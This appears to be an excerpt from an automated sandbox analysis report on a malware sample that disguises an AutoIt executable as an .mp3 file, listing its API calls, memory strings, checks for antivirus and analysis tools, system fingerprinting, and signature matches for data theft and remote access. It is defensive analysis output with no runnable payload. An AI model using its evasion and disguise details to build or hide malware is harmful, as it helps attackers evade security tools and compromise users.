Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 7_2_003D13F2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 7_2_003D1EF3
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007847000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.000000000113B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: qwlvpmrupf.mp3, 00000007.00000003.1947990948.00000000010A2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947564822.000000000109B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: qwlvpmrupf.mp3, qwlvpmrupf.mp3.exe Binary or memory string: Shell_TrayWnd
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296018168.0000000001403000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerq=
Source: qwlvpmrupf.mp3, 00000007.00000003.1950739253.000000000104C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950894323.0000000001053000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" ThenLL
Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001043000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" ThenEy

Language, Device and Operating System Detection

barindex
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3 PID: 7640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8188, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 4092, type: MEMORYSTR
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26694 cpuid 0_2_00B26694
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00B1FD34
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00B2454A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003CE5F8 GetUserNameW, 7_2_003CE5F8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003ABF0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 7_2_003ABF0F
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B103BE GetVersionExW, 0_2_00B103BE
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078194158.0000000001805000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079848349.0000000001806000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tcpview.exe
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078194158.0000000001805000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079848349.0000000001806000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2298245187.0000000001457000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2295050047.0000000001455000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294907619.0000000001447000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301395963.0000000001458000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214186237.0000000001A50000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217828434.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVGUI.exe
Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Procmon.exe
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2068593152.00000000066C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2287549394.0000000005FC3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1932421408.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_81
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_XP
Source: qwlvpmrupf.mp3.exe, 00000013.00000000.2185210747.0000000000E53000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_XPe
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_VISTA
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_7
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_8

Remote Access Functionality

barindex
Source: Yara match File source: 0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2068593152.00000000066C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2287549394.0000000005FC3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1932421408.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003F2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 7_2_003F2163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003F1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 7_2_003F1B61
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A49B4B socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError, 15_2_05A49B4B
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E12163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 16_2_00E12163
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E11B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 16_2_00E11B61
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs